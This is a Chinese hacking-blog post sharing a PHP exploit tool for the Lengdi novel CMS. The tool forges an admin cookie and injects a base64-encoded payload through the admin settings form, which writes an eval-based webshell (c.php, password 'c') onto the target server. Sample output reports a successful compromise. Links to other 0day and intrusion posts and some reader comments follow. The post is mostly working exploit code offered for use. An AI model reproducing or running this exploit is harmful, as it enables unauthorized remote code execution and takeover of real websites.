冷迪小说系统漏洞利用工具
前段时间爆出来的漏洞,没愿意贴上来,因为很多地方都有转载,今天给个利用工具。
来源:http://www.t00ls.net/thread-5452-1-1.html
<?php
ini_set("max_execution_time",0);
function post($v_hosts,$v_paths,$v_p)
{
$host = $v_hosts;
$path = $v_paths;
$pa = $v_p;
$data="sitename=&siteurl=%24%7B%24%7Bfputs%28fopen%28base64_decode%28Yy5waHA%29%2Cw%29%2Cbase64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5odWFu%29%29%7D%7D&email=&keywords=&flush=6&html=1&reurl=1&link=&tongji=&cmdSave=%C8%B7%C8%CF%D0%DE%B8%C4";
$packet ="POST ".$path.$pa."/admin_man.php?id=save HTTP/1.1\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: 127.0.0.1\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cookie: x_Cookie=admin;\r\n\r\n";
$packet.=$data;
$o = @fsockopen($host,80);
if(!$o){
echo "\n[x] 没有返回,网站有可能访问不了!";
die;
}
fputs($o,$packet);
$i="[x]等待中.";
echo $i;
$b=".";
while (!feof($o)){
$data.=fread($o,1024);
$b.=".";
echo $b;
}
fclose($o);
$ok=strstr( $data,"alert");
if( empty($ok)){
echo "\n[x] 未成功,至于原因嘛,自己找吧!";
die;
}else{
echo "\n[O]写入配置成功!\r\n";
}
}
function got($g_hosts,$g_paths)
{
$host1 = $g_hosts;
$path1 = $g_paths;
$packet1="GET ".$path1."/config.php HTTP/1.1\r\n";
$packet1.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet1.="Host: 127.0.0.1\r\n";
$packet1.="Connection: Keep-Alive\r\n\r\n";
$fg = @fsockopen($host1,80);
fputs($fg,$packet1);
$packet2="GET ".$path1."/c.php HTTP/1.1\r\n";
$packet2.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet2.="Host: 127.0.0.1\r\n";
$packet2.="Connection: Keep-Alive\r\n\r\n";
fputs($fg,$packet2);
$i="[x]写入shell中.";
echo $i;
$b=".";
while(!feof($fg)){
$data1.=fread($fg,1024);
$b.=".";
echo $b;
}
$ok1 = strstr( $data1,"huan");
if (empty($ok1)){
echo "\n[x] 没有写入?自己查找原因。";
die;
}else{
echo "\n[O]试试webshell吧 \r\n[O]地址是http://".$host1."/c.php 密码是 c 。";
}
fclose($fg);
}
$hosts = $argv[1];
$paths = $argv[2];
$p = $argv[3];
if(empty($hosts) or empty($paths) or empty($p)){
print_r(' [x] 冷迪小说系统漏洞利用工具
[x] CODE BY 幻泉(bl4ck)
[-] 用法: php exp.php 网站地址 网站路径 后台路径
[-] php exp.php localhost /ldbook/ admin
');
die;
}
post($hosts,$paths,$p);
got($hosts,$paths);
?>
C:\php>php.exe exp.php 192.168.1.51 /ldbook/ admin
[x]等待中......
[O]写入配置成功!
[x]写入shell中..........
[O]试试webshell吧
[O]地址http://192.168.1.51/c.php 密码是 c 。
C:\php>
- 百度也被入侵(准确的说是劫持)(2010-1-12 12:6:53)
- 金威世家服装有限公司FLASH整站 0day(2010-1-7 23:3:45)
- EXE内存寄生者(很淫-荡的东西)(2010-1-7 21:53:48)
- 人人网被入侵(2010-1-3 19:28:44)
- 一切为了暗链,风讯CMS爆0day(2009-12-31 10:8:12)
- 进程注入辅助工具(2009-12-30 22:25:35)
- Fckeditor的一些漏洞总结(2009-12-27 22:23:51)
- Ewebeditor的一些漏洞总结(2009-12-27 10:52:57)
- ShopWind 0Day漏洞(2009-12-25 14:47:58)
- 对华军软件站一次失败的入侵(2009-12-25 10:36:14)
刚开站的时候按的站经常被别人高破坏
技术文章呀我不是很懂啊
下次遇上问题了再来向博主请教哦
过来支持你一下
可以和博主交换友情链接吗 我对网站安全也很感兴趣白银时代 于 2010-1-17 22:45:24 回复已添加
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。